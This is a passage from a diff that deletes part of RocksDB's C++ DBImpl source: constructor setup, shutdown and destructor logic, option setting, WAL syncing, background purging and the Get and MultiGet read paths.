-      mutex_(stats_, env_, DB_MUTEX_WAIT_MICROS,
-             immutable_db_options_.use_adaptive_mutex),
-      shutting_down_(false),
-      bg_cv_(&mutex_),
-      logfile_number_(0),
-      log_dir_synced_(false),
-      log_empty_(true),
-      default_cf_handle_(nullptr),
-      log_sync_cv_(&mutex_),
-      total_log_size_(0),
-      max_total_in_memory_state_(0),
-      is_snapshot_supported_(true),
-      write_buffer_manager_(immutable_db_options_.write_buffer_manager.get()),
-      write_thread_(immutable_db_options_),
-      nonmem_write_thread_(immutable_db_options_),
-      write_controller_(mutable_db_options_.delayed_write_rate),
-      // Use delayed_write_rate as a base line to determine the initial
-      // low pri write rate limit. It may be adjusted later.
-      low_pri_write_rate_limiter_(NewGenericRateLimiter(std::min(
-          static_cast<int64_t>(mutable_db_options_.delayed_write_rate / 8),
-          kDefaultLowPriThrottledRate))),
-      last_batch_group_size_(0),
-      unscheduled_flushes_(0),
-      unscheduled_compactions_(0),
-      bg_bottom_compaction_scheduled_(0),
-      bg_compaction_scheduled_(0),
-      num_running_compactions_(0),
-      bg_flush_scheduled_(0),
-      num_running_flushes_(0),
-      bg_purge_scheduled_(0),
-      disable_delete_obsolete_files_(0),
-      delete_obsolete_files_last_run_(env_->NowMicros()),
-      last_stats_dump_time_microsec_(0),
-      next_job_id_(1),
-      has_unpersisted_data_(false),
-      unable_to_flush_oldest_log_(false),
-      env_options_(BuildDBOptions(immutable_db_options_, mutable_db_options_)),
-      num_running_ingest_file_(0),
-#ifndef ROCKSDB_LITE
-      wal_manager_(immutable_db_options_, env_options_),
-#endif  // ROCKSDB_LITE
-      event_logger_(immutable_db_options_.info_log.get()),
-      bg_work_paused_(0),
-      bg_compaction_paused_(0),
-      refitting_level_(false),
-      opened_successfully_(false),
-      concurrent_prepare_(options.concurrent_prepare),
-      manual_wal_flush_(options.manual_wal_flush) {
-  env_->GetAbsolutePath(dbname, &db_absolute_path_);
-
-  // Reserve ten files or so for other uses and give the rest to TableCache.
-  // Give a large number for setting of "infinite" open files.
-  const int table_cache_size = (mutable_db_options_.max_open_files == -1)
-                                   ? TableCache::kInfiniteCapacity
-                                   : mutable_db_options_.max_open_files - 10;
-  table_cache_ = NewLRUCache(table_cache_size,
-                             immutable_db_options_.table_cache_numshardbits);
-
-  versions_.reset(new VersionSet(dbname_, &immutable_db_options_, env_options_,
-                                 table_cache_.get(), write_buffer_manager_,
-                                 &write_controller_));
-  column_family_memtables_.reset(
-      new ColumnFamilyMemTablesImpl(versions_->GetColumnFamilySet()));
-
-  DumpRocksDBBuildVersion(immutable_db_options_.info_log.get());
-  DumpDBFileSummary(immutable_db_options_, dbname_);
-  immutable_db_options_.Dump(immutable_db_options_.info_log.get());
-  mutable_db_options_.Dump(immutable_db_options_.info_log.get());
-  DumpSupportInfo(immutable_db_options_.info_log.get());
-}
-
-// Will lock the mutex_,  will wait for completion if wait is true
-void DBImpl::CancelAllBackgroundWork(bool wait) {
-  InstrumentedMutexLock l(&mutex_);
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "Shutdown: canceling all background work");
-
-  if (!shutting_down_.load(std::memory_order_acquire) &&
-      has_unpersisted_data_.load(std::memory_order_relaxed) &&
-      !mutable_db_options_.avoid_flush_during_shutdown) {
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      if (!cfd->IsDropped() && cfd->initialized() && !cfd->mem()->IsEmpty()) {
-        cfd->Ref();
-        mutex_.Unlock();
-        FlushMemTable(cfd, FlushOptions());
-        mutex_.Lock();
-        cfd->Unref();
-      }
-    }
-    versions_->GetColumnFamilySet()->FreeDeadColumnFamilies();
-  }
-
-  shutting_down_.store(true, std::memory_order_release);
-  bg_cv_.SignalAll();
-  if (!wait) {
-    return;
-  }
-  // Wait for background work to finish
-  while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ ||
-         bg_flush_scheduled_) {
-    bg_cv_.Wait();
-  }
-}
-
-DBImpl::~DBImpl() {
-  // CancelAllBackgroundWork called with false means we just set the shutdown
-  // marker. After this we do a variant of the waiting and unschedule work
-  // (to consider: moving all the waiting into CancelAllBackgroundWork(true))
-  CancelAllBackgroundWork(false);
-  int bottom_compactions_unscheduled =
-      env_->UnSchedule(this, Env::Priority::BOTTOM);
-  int compactions_unscheduled = env_->UnSchedule(this, Env::Priority::LOW);
-  int flushes_unscheduled = env_->UnSchedule(this, Env::Priority::HIGH);
-  mutex_.Lock();
-  bg_bottom_compaction_scheduled_ -= bottom_compactions_unscheduled;
-  bg_compaction_scheduled_ -= compactions_unscheduled;
-  bg_flush_scheduled_ -= flushes_unscheduled;
-
-  // Wait for background work to finish
-  while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ ||
-         bg_flush_scheduled_ || bg_purge_scheduled_) {
-    TEST_SYNC_POINT("DBImpl::~DBImpl:WaitJob");
-    bg_cv_.Wait();
-  }
-  EraseThreadStatusDbInfo();
-  flush_scheduler_.Clear();
-
-  while (!flush_queue_.empty()) {
-    auto cfd = PopFirstFromFlushQueue();
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-  while (!compaction_queue_.empty()) {
-    auto cfd = PopFirstFromCompactionQueue();
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-
-  if (default_cf_handle_ != nullptr) {
-    // we need to delete handle outside of lock because it does its own locking
-    mutex_.Unlock();
-    delete default_cf_handle_;
-    mutex_.Lock();
-  }
-
-  // Clean up obsolete files due to SuperVersion release.
-  // (1) Need to delete to obsolete files before closing because RepairDB()
-  // scans all existing files in the file system and builds manifest file.
-  // Keeping obsolete files confuses the repair process.
-  // (2) Need to check if we Open()/Recover() the DB successfully before
-  // deleting because if VersionSet recover fails (may be due to corrupted
-  // manifest file), it is not able to identify live files correctly. As a
-  // result, all "live" files can get deleted by accident. However, corrupted
-  // manifest is recoverable by RepairDB().
-  if (opened_successfully_) {
-    JobContext job_context(next_job_id_.fetch_add(1));
-    FindObsoleteFiles(&job_context, true);
-
-    mutex_.Unlock();
-    // manifest number starting from 2
-    job_context.manifest_file_number = 1;
-    if (job_context.HaveSomethingToDelete()) {
-      PurgeObsoleteFiles(job_context);
-    }
-    job_context.Clean();
-    mutex_.Lock();
-  }
-
-  for (auto l : logs_to_free_) {
-    delete l;
-  }
-  for (auto& log : logs_) {
-    log.ClearWriter();
-  }
-  logs_.clear();
-
-  // Table cache may have table handles holding blocks from the block cache.
-  // We need to release them before the block cache is destroyed. The block
-  // cache may be destroyed inside versions_.reset(), when column family data
-  // list is destroyed, so leaving handles in table cache after
-  // versions_.reset() may cause issues.
-  // Here we clean all unreferenced handles in table cache.
-  // Now we assume all user queries have finished, so only version set itself
-  // can possibly hold the blocks from block cache. After releasing unreferenced
-  // handles here, only handles held by version set left and inside
-  // versions_.reset(), we will release them. There, we need to make sure every
-  // time a handle is released, we erase it from the cache too. By doing that,
-  // we can guarantee that after versions_.reset(), table cache is empty
-  // so the cache can be safely destroyed.
-  table_cache_->EraseUnRefEntries();
-
-  for (auto& txn_entry : recovered_transactions_) {
-    delete txn_entry.second;
-  }
-
-  // versions need to be destroyed before table_cache since it can hold
-  // references to table_cache.
-  versions_.reset();
-  mutex_.Unlock();
-  if (db_lock_ != nullptr) {
-    env_->UnlockFile(db_lock_);
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log, "Shutdown complete");
-  LogFlush(immutable_db_options_.info_log);
-}
-
-void DBImpl::MaybeIgnoreError(Status* s) const {
-  if (s->ok() || immutable_db_options_.paranoid_checks) {
-    // No change needed
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "Ignoring error %s",
-                   s->ToString().c_str());
-    *s = Status::OK();
-  }
-}
-
-const Status DBImpl::CreateArchivalDirectory() {
-  if (immutable_db_options_.wal_ttl_seconds > 0 ||
-      immutable_db_options_.wal_size_limit_mb > 0) {
-    std::string archivalPath = ArchivalDirectory(immutable_db_options_.wal_dir);
-    return env_->CreateDirIfMissing(archivalPath);
-  }
-  return Status::OK();
-}
-
-void DBImpl::PrintStatistics() {
-  auto dbstats = immutable_db_options_.statistics.get();
-  if (dbstats) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "STATISTICS:\n %s",
-                   dbstats->ToString().c_str());
-  }
-}
-
-void DBImpl::MaybeDumpStats() {
-  mutex_.Lock();
-  unsigned int stats_dump_period_sec =
-      mutable_db_options_.stats_dump_period_sec;
-  mutex_.Unlock();
-  if (stats_dump_period_sec == 0) return;
-
-  const uint64_t now_micros = env_->NowMicros();
-
-  if (last_stats_dump_time_microsec_ + stats_dump_period_sec * 1000000 <=
-      now_micros) {
-    // Multiple threads could race in here simultaneously.
-    // However, the last one will update last_stats_dump_time_microsec_
-    // atomically. We could see more than one dump during one dump
-    // period in rare cases.
-    last_stats_dump_time_microsec_ = now_micros;
-
-#ifndef ROCKSDB_LITE
-    const DBPropertyInfo* cf_property_info =
-        GetPropertyInfo(DB::Properties::kCFStats);
-    assert(cf_property_info != nullptr);
-    const DBPropertyInfo* db_property_info =
-        GetPropertyInfo(DB::Properties::kDBStats);
-    assert(db_property_info != nullptr);
-
-    std::string stats;
-    {
-      InstrumentedMutexLock l(&mutex_);
-      default_cf_internal_stats_->GetStringProperty(
-          *db_property_info, DB::Properties::kDBStats, &stats);
-      for (auto cfd : *versions_->GetColumnFamilySet()) {
-        if (cfd->initialized()) {
-          cfd->internal_stats()->GetStringProperty(
-              *cf_property_info, DB::Properties::kCFStatsNoFileHistogram,
-              &stats);
-        }
-      }
-      for (auto cfd : *versions_->GetColumnFamilySet()) {
-        if (cfd->initialized()) {
-          cfd->internal_stats()->GetStringProperty(
-              *cf_property_info, DB::Properties::kCFFileHistogram, &stats);
-        }
-      }
-    }
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "------- DUMPING STATS -------");
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "%s", stats.c_str());
-    if (immutable_db_options_.dump_malloc_stats) {
-      stats.clear();
-      DumpMallocStats(&stats);
-      if (!stats.empty()) {
-        ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                       "------- Malloc STATS -------");
-        ROCKS_LOG_WARN(immutable_db_options_.info_log, "%s", stats.c_str());
-      }
-    }
-#endif  // !ROCKSDB_LITE
-
-    PrintStatistics();
-  }
-}
-
-void DBImpl::ScheduleBgLogWriterClose(JobContext* job_context) {
-  if (!job_context->logs_to_free.empty()) {
-    for (auto l : job_context->logs_to_free) {
-      AddToLogsToFreeQueue(l);
-    }
-    job_context->logs_to_free.clear();
-    SchedulePurge();
-  }
-}
-
-Directory* DBImpl::Directories::GetDataDir(size_t path_id) {
-  assert(path_id < data_dirs_.size());
-  Directory* ret_dir = data_dirs_[path_id].get();
-  if (ret_dir == nullptr) {
-    // Should use db_dir_
-    return db_dir_.get();
-  }
-  return ret_dir;
-}
-
-Status DBImpl::SetOptions(ColumnFamilyHandle* column_family,
-    const std::unordered_map<std::string, std::string>& options_map) {
-#ifdef ROCKSDB_LITE
-  return Status::NotSupported("Not supported in ROCKSDB LITE");
-#else
-  auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  if (options_map.empty()) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "SetOptions() on column family [%s], empty input",
-                   cfd->GetName().c_str());
-    return Status::InvalidArgument("empty input");
-  }
-
-  MutableCFOptions new_options;
-  Status s;
-  Status persist_options_status;
-  WriteThread::Writer w;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    s = cfd->SetOptions(options_map);
-    if (s.ok()) {
-      new_options = *cfd->GetLatestMutableCFOptions();
-      // Append new version to recompute compaction score.
-      VersionEdit dummy_edit;
-      versions_->LogAndApply(cfd, new_options, &dummy_edit, &mutex_,
-                             directories_.GetDbDir());
-      // Trigger possible flush/compactions. This has to be before we persist
-      // options to file, otherwise there will be a deadlock with writer
-      // thread.
-      auto* old_sv =
-          InstallSuperVersionAndScheduleWork(cfd, nullptr, new_options);
-      delete old_sv;
-
-      persist_options_status = WriteOptionsFile(
-          false /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    }
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "SetOptions() on column family [%s], inputs:",
-                 cfd->GetName().c_str());
-  for (const auto& o : options_map) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "%s: %s\n", o.first.c_str(),
-                   o.second.c_str());
-  }
-  if (s.ok()) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[%s] SetOptions() succeeded", cfd->GetName().c_str());
-    new_options.Dump(immutable_db_options_.info_log.get());
-    if (!persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "[%s] SetOptions() failed",
-                   cfd->GetName().c_str());
-  }
-  LogFlush(immutable_db_options_.info_log);
-  return s;
-#endif  // ROCKSDB_LITE
-}
-
-Status DBImpl::SetDBOptions(
-    const std::unordered_map<std::string, std::string>& options_map) {
-#ifdef ROCKSDB_LITE
-  return Status::NotSupported("Not supported in ROCKSDB LITE");
-#else
-  if (options_map.empty()) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "SetDBOptions(), empty input.");
-    return Status::InvalidArgument("empty input");
-  }
-
-  MutableDBOptions new_options;
-  Status s;
-  Status persist_options_status;
-  WriteThread::Writer w;
-  WriteContext write_context;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    s = GetMutableDBOptionsFromStrings(mutable_db_options_, options_map,
-                                       &new_options);
-    if (s.ok()) {
-      if (new_options.max_background_compactions >
-          mutable_db_options_.max_background_compactions) {
-        env_->IncBackgroundThreadsIfNeeded(
-            new_options.max_background_compactions, Env::Priority::LOW);
-        MaybeScheduleFlushOrCompaction();
-      }
-
-      write_controller_.set_max_delayed_write_rate(new_options.delayed_write_rate);
-      table_cache_.get()->SetCapacity(new_options.max_open_files == -1
-                                          ? TableCache::kInfiniteCapacity
-                                          : new_options.max_open_files - 10);
-
-      mutable_db_options_ = new_options;
-
-      write_thread_.EnterUnbatched(&w, &mutex_);
-      if (total_log_size_ > GetMaxTotalWalSize()) {
-        Status purge_wal_status = HandleWALFull(&write_context);
-        if (!purge_wal_status.ok()) {
-          ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                         "Unable to purge WAL files in SetDBOptions() -- %s",
-                         purge_wal_status.ToString().c_str());
-        }
-      }
-      persist_options_status = WriteOptionsFile(
-          false /*need_mutex_lock*/, false /*need_enter_write_thread*/);
-      write_thread_.ExitUnbatched(&w);
-    }
-  }
-  ROCKS_LOG_INFO(immutable_db_options_.info_log, "SetDBOptions(), inputs:");
-  for (const auto& o : options_map) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "%s: %s\n", o.first.c_str(),
-                   o.second.c_str());
-  }
-  if (s.ok()) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "SetDBOptions() succeeded");
-    new_options.Dump(immutable_db_options_.info_log.get());
-    if (!persist_options_status.ok()) {
-      if (immutable_db_options_.fail_if_options_file_error) {
-        s = Status::IOError(
-            "SetDBOptions() succeeded, but unable to persist options",
-            persist_options_status.ToString());
-      }
-      ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                     "Unable to persist options in SetDBOptions() -- %s",
-                     persist_options_status.ToString().c_str());
-    }
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "SetDBOptions failed");
-  }
-  LogFlush(immutable_db_options_.info_log);
-  return s;
-#endif  // ROCKSDB_LITE
-}
-
-// return the same level if it cannot be moved
-int DBImpl::FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd,
-    const MutableCFOptions& mutable_cf_options, int level) {
-  mutex_.AssertHeld();
-  const auto* vstorage = cfd->current()->storage_info();
-  int minimum_level = level;
-  for (int i = level - 1; i > 0; --i) {
-    // stop if level i is not empty
-    if (vstorage->NumLevelFiles(i) > 0) break;
-    // stop if level i is too small (cannot fit the level files)
-    if (vstorage->MaxBytesForLevel(i) < vstorage->NumLevelBytes(level)) {
-      break;
-    }
-
-    minimum_level = i;
-  }
-  return minimum_level;
-}
-
-Status DBImpl::FlushWAL(bool sync) {
-  {
-    // We need to lock log_write_mutex_ since logs_ might change concurrently
-    InstrumentedMutexLock wl(&log_write_mutex_);
-    log::Writer* cur_log_writer = logs_.back().writer;
-    auto s = cur_log_writer->WriteBuffer();
-    if (!s.ok()) {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log, "WAL flush error %s",
-                      s.ToString().c_str());
-    }
-    if (!sync) {
-      ROCKS_LOG_DEBUG(immutable_db_options_.info_log, "FlushWAL sync=false");
-      return s;
-    }
-  }
-  // sync = true
-  ROCKS_LOG_DEBUG(immutable_db_options_.info_log, "FlushWAL sync=true");
-  return SyncWAL();
-}
-
-Status DBImpl::SyncWAL() {
-  autovector<log::Writer*, 1> logs_to_sync;
-  bool need_log_dir_sync;
-  uint64_t current_log_number;
-
-  {
-    InstrumentedMutexLock l(&mutex_);
-    assert(!logs_.empty());
-
-    // This SyncWAL() call only cares about logs up to this number.
-    current_log_number = logfile_number_;
-
-    while (logs_.front().number <= current_log_number &&
-           logs_.front().getting_synced) {
-      log_sync_cv_.Wait();
-    }
-    // First check that logs are safe to sync in background.
-    for (auto it = logs_.begin();
-         it != logs_.end() && it->number <= current_log_number; ++it) {
-      if (!it->writer->file()->writable_file()->IsSyncThreadSafe()) {
-        return Status::NotSupported(
-            "SyncWAL() is not supported for this implementation of WAL file",
-            immutable_db_options_.allow_mmap_writes
-                ? "try setting Options::allow_mmap_writes to false"
-                : Slice());
-      }
-    }
-    for (auto it = logs_.begin();
-         it != logs_.end() && it->number <= current_log_number; ++it) {
-      auto& log = *it;
-      assert(!log.getting_synced);
-      log.getting_synced = true;
-      logs_to_sync.push_back(log.writer);
-    }
-
-    need_log_dir_sync = !log_dir_synced_;
-  }
-
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:1");
-  RecordTick(stats_, WAL_FILE_SYNCED);
-  Status status;
-  for (log::Writer* log : logs_to_sync) {
-    status = log->file()->SyncWithoutFlush(immutable_db_options_.use_fsync);
-    if (!status.ok()) {
-      break;
-    }
-  }
-  if (status.ok() && need_log_dir_sync) {
-    status = directories_.GetWalDir()->Fsync();
-  }
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:2");
-
-  TEST_SYNC_POINT("DBImpl::SyncWAL:BeforeMarkLogsSynced:1");
-  {
-    InstrumentedMutexLock l(&mutex_);
-    MarkLogsSynced(current_log_number, need_log_dir_sync, status);
-  }
-  TEST_SYNC_POINT("DBImpl::SyncWAL:BeforeMarkLogsSynced:2");
-
-  return status;
-}
-
-void DBImpl::MarkLogsSynced(
-    uint64_t up_to, bool synced_dir, const Status& status) {
-  mutex_.AssertHeld();
-  if (synced_dir &&
-      logfile_number_ == up_to &&
-      status.ok()) {
-    log_dir_synced_ = true;
-  }
-  for (auto it = logs_.begin(); it != logs_.end() && it->number <= up_to;) {
-    auto& log = *it;
-    assert(log.getting_synced);
-    if (status.ok() && logs_.size() > 1) {
-      logs_to_free_.push_back(log.ReleaseWriter());
-      it = logs_.erase(it);
-    } else {
-      log.getting_synced = false;
-      ++it;
-    }
-  }
-  assert(!status.ok() || logs_.empty() || logs_[0].number > up_to ||
-         (logs_.size() == 1 && !logs_[0].getting_synced));
-  log_sync_cv_.SignalAll();
-}
-
-SequenceNumber DBImpl::GetLatestSequenceNumber() const {
-  return versions_->LastSequence();
-}
-
-InternalIterator* DBImpl::NewInternalIterator(
-    Arena* arena, RangeDelAggregator* range_del_agg,
-    ColumnFamilyHandle* column_family) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-
-  mutex_.Lock();
-  SuperVersion* super_version = cfd->GetSuperVersion()->Ref();
-  mutex_.Unlock();
-  ReadOptions roptions;
-  return NewInternalIterator(roptions, cfd, super_version, arena,
-                             range_del_agg);
-}
-
-void DBImpl::SchedulePurge() {
-  mutex_.AssertHeld();
-  assert(opened_successfully_);
-
-  // Purge operations are put into High priority queue
-  bg_purge_scheduled_++;
-  env_->Schedule(&DBImpl::BGWorkPurge, this, Env::Priority::HIGH, nullptr);
-}
-
-void DBImpl::BackgroundCallPurge() {
-  mutex_.Lock();
-
-  // We use one single loop to clear both queues so that after existing the loop
-  // both queues are empty. This is stricter than what is needed, but can make
-  // it easier for us to reason the correctness.
-  while (!purge_queue_.empty() || !logs_to_free_queue_.empty()) {
-    if (!purge_queue_.empty()) {
-      auto purge_file = purge_queue_.begin();
-      auto fname = purge_file->fname;
-      auto type = purge_file->type;
-      auto number = purge_file->number;
-      auto path_id = purge_file->path_id;
-      auto job_id = purge_file->job_id;
-      purge_queue_.pop_front();
-
-      mutex_.Unlock();
-      Status file_deletion_status;
-      DeleteObsoleteFileImpl(file_deletion_status, job_id, fname, type, number,
-                             path_id);
-      mutex_.Lock();
-    } else {
-      assert(!logs_to_free_queue_.empty());
-      log::Writer* log_writer = *(logs_to_free_queue_.begin());
-      logs_to_free_queue_.pop_front();
-      mutex_.Unlock();
-      delete log_writer;
-      mutex_.Lock();
-    }
-  }
-  bg_purge_scheduled_--;
-
-  bg_cv_.SignalAll();
-  // IMPORTANT:there should be no code after calling SignalAll. This call may
-  // signal the DB destructor that it's OK to proceed with destruction. In
-  // that case, all DB variables will be dealloacated and referencing them
-  // will cause trouble.
-  mutex_.Unlock();
-}
-
-namespace {
-struct IterState {
-  IterState(DBImpl* _db, InstrumentedMutex* _mu, SuperVersion* _super_version,
-            bool _background_purge)
-      : db(_db),
-        mu(_mu),
-        super_version(_super_version),
-        background_purge(_background_purge) {}
-
-  DBImpl* db;
-  InstrumentedMutex* mu;
-  SuperVersion* super_version;
-  bool background_purge;
-};
-
-static void CleanupIteratorState(void* arg1, void* arg2) {
-  IterState* state = reinterpret_cast<IterState*>(arg1);
-
-  if (state->super_version->Unref()) {
-    // Job id == 0 means that this is not our background process, but rather
-    // user thread
-    JobContext job_context(0);
-
-    state->mu->Lock();
-    state->super_version->Cleanup();
-    state->db->FindObsoleteFiles(&job_context, false, true);
-    if (state->background_purge) {
-      state->db->ScheduleBgLogWriterClose(&job_context);
-    }
-    state->mu->Unlock();
-
-    delete state->super_version;
-    if (job_context.HaveSomethingToDelete()) {
-      if (state->background_purge) {
-        // PurgeObsoleteFiles here does not delete files. Instead, it adds the
-        // files to be deleted to a job queue, and deletes it in a separate
-        // background thread.
-        state->db->PurgeObsoleteFiles(job_context, true /* schedule only */);
-        state->mu->Lock();
-        state->db->SchedulePurge();
-        state->mu->Unlock();
-      } else {
-        state->db->PurgeObsoleteFiles(job_context);
-      }
-    }
-    job_context.Clean();
-  }
-
-  delete state;
-}
-}  // namespace
-
-InternalIterator* DBImpl::NewInternalIterator(
-    const ReadOptions& read_options, ColumnFamilyData* cfd,
-    SuperVersion* super_version, Arena* arena,
-    RangeDelAggregator* range_del_agg) {
-  InternalIterator* internal_iter;
-  assert(arena != nullptr);
-  assert(range_del_agg != nullptr);
-  // Need to create internal iterator from the arena.
-  MergeIteratorBuilder merge_iter_builder(
-      &cfd->internal_comparator(), arena,
-      !read_options.total_order_seek &&
-          cfd->ioptions()->prefix_extractor != nullptr);
-  // Collect iterator for mutable mem
-  merge_iter_builder.AddIterator(
-      super_version->mem->NewIterator(read_options, arena));
-  std::unique_ptr<InternalIterator> range_del_iter;
-  Status s;
-  if (!read_options.ignore_range_deletions) {
-    range_del_iter.reset(
-        super_version->mem->NewRangeTombstoneIterator(read_options));
-    s = range_del_agg->AddTombstones(std::move(range_del_iter));
-  }
-  // Collect all needed child iterators for immutable memtables
-  if (s.ok()) {
-    super_version->imm->AddIterators(read_options, &merge_iter_builder);
-    if (!read_options.ignore_range_deletions) {
-      s = super_version->imm->AddRangeTombstoneIterators(read_options, arena,
-                                                         range_del_agg);
-    }
-  }
-  if (s.ok()) {
-    // Collect iterators for files in L0 - Ln
-    if (read_options.read_tier != kMemtableTier) {
-      super_version->current->AddIterators(read_options, env_options_,
-                                           &merge_iter_builder, range_del_agg);
-    }
-    internal_iter = merge_iter_builder.Finish();
-    IterState* cleanup =
-        new IterState(this, &mutex_, super_version,
-                      read_options.background_purge_on_iterator_cleanup);
-    internal_iter->RegisterCleanup(CleanupIteratorState, cleanup, nullptr);
-
-    return internal_iter;
-  }
-  return NewErrorInternalIterator(s);
-}
-
-ColumnFamilyHandle* DBImpl::DefaultColumnFamily() const {
-  return default_cf_handle_;
-}
-
-Status DBImpl::Get(const ReadOptions& read_options,
-                   ColumnFamilyHandle* column_family, const Slice& key,
-                   PinnableSlice* value) {
-  return GetImpl(read_options, column_family, key, value);
-}
-
-Status DBImpl::GetImpl(const ReadOptions& read_options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       PinnableSlice* pinnable_val, bool* value_found,
-                       bool* is_blob_index) {
-  assert(pinnable_val != nullptr);
-  StopWatch sw(env_, stats_, DB_GET);
-  PERF_TIMER_GUARD(get_snapshot_time);
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Acquire SuperVersion
-  SuperVersion* sv = GetAndRefSuperVersion(cfd);
-
-  TEST_SYNC_POINT("DBImpl::GetImpl:1");
-  TEST_SYNC_POINT("DBImpl::GetImpl:2");
-
-  SequenceNumber snapshot;
-  if (read_options.snapshot != nullptr) {
-    snapshot = reinterpret_cast<const SnapshotImpl*>(
-        read_options.snapshot)->number_;
-  } else {
-    // Since we get and reference the super version before getting
-    // the snapshot number, without a mutex protection, it is possible
-    // that a memtable switch happened in the middle and not all the
-    // data for this snapshot is available. But it will contain all
-    // the data available in the super version we have, which is also
-    // a valid snapshot to read from.
-    // We shouldn't get snapshot before finding and referencing the
-    // super versipon because a flush happening in between may compact
-    // away data for the snapshot, but the snapshot is earlier than the
-    // data overwriting it, so users may see wrong results.
-    snapshot = versions_->LastSequence();
-  }
-  TEST_SYNC_POINT("DBImpl::GetImpl:3");
-  TEST_SYNC_POINT("DBImpl::GetImpl:4");
-
-  // Prepare to store a list of merge operations if merge occurs.
-  MergeContext merge_context;
-  RangeDelAggregator range_del_agg(cfd->internal_comparator(), snapshot);
-
-  Status s;
-  // First look in the memtable, then in the immutable memtable (if any).
-  // s is both in/out. When in, s could either be OK or MergeInProgress.
-  // merge_operands will contain the sequence of merges in the latter case.
-  LookupKey lkey(key, snapshot);
-  PERF_TIMER_STOP(get_snapshot_time);
-
-  bool skip_memtable = (read_options.read_tier == kPersistedTier &&
-                        has_unpersisted_data_.load(std::memory_order_relaxed));
-  bool done = false;
-  if (!skip_memtable) {
-    if (sv->mem->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context,
-                     &range_del_agg, read_options, is_blob_index)) {
-      done = true;
-      pinnable_val->PinSelf();
-      RecordTick(stats_, MEMTABLE_HIT);
-    } else if ((s.ok() || s.IsMergeInProgress()) &&
-               sv->imm->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context,
-                            &range_del_agg, read_options, is_blob_index)) {
-      done = true;
-      pinnable_val->PinSelf();
-      RecordTick(stats_, MEMTABLE_HIT);
-    }
-    if (!done && !s.ok() && !s.IsMergeInProgress()) {
-      return s;
-    }
-  }
-  if (!done) {
-    PERF_TIMER_GUARD(get_from_output_files_time);
-    sv->current->Get(read_options, lkey, pinnable_val, &s, &merge_context,
-                     &range_del_agg, value_found, nullptr, nullptr,
-                     is_blob_index);
-    RecordTick(stats_, MEMTABLE_MISS);
-  }
-
-  {
-    PERF_TIMER_GUARD(get_post_process_time);
-
-    ReturnAndCleanupSuperVersion(cfd, sv);
-
-    RecordTick(stats_, NUMBER_KEYS_READ);
-    size_t size = pinnable_val->size();
-    RecordTick(stats_, BYTES_READ, size);
-    MeasureTime(stats_, BYTES_PER_READ, size);
-    PERF_COUNTER_ADD(get_read_bytes, size);
-  }
-  return s;
-}
-
-std::vector<Status> DBImpl::MultiGet(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-
-  StopWatch sw(env_, stats_, DB_MULTIGET);
-  PERF_TIMER_GUARD(get_snapshot_time);
-
-  SequenceNumber snapshot;
-
-  struct MultiGetColumnFamilyData {
-    ColumnFamilyData* cfd;
-    SuperVersion* super_version;
-  };
-  std::unordered_map<uint32_t, MultiGetColumnFamilyData*> multiget_cf_data;
-  // fill up and allocate outside of mutex
-  for (auto cf : column_family) {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(cf);
-    auto cfd = cfh->cfd();
-    if (multiget_cf_data.find(cfd->GetID()) == multiget_cf_data.end()) {
-      auto mgcfd = new MultiGetColumnFamilyData();
-      mgcfd->cfd = cfd;
-      multiget_cf_data.insert({cfd->GetID(), mgcfd});
-    }
-  }
-
-  mutex_.Lock();
-  if (read_options.snapshot != nullptr) {
-    snapshot = reinterpret_cast<const SnapshotImpl*>(
-        read_options.snapshot)->number_;
-  } else {
-    snapshot = versions_->LastSequence();
-  }
-  for (auto mgd_iter : multiget_cf_data) {
-    mgd_iter.second->super_version =
-        mgd_iter.second->cfd->GetSuperVersion()->Ref();
-  }
-  mutex_.Unlock();
-
-  // Contain a list of merge operations if merge occurs.
-  MergeContext merge_context;
-
-  // Note: this always resizes the values array
-  size_t num_keys = keys.size();
-  std::vector<Status> stat_list(num_keys);
-  values->resize(num_keys);
-
-  // Keep track of bytes that we read for statistics-recording later
-  uint64_t bytes_read = 0;
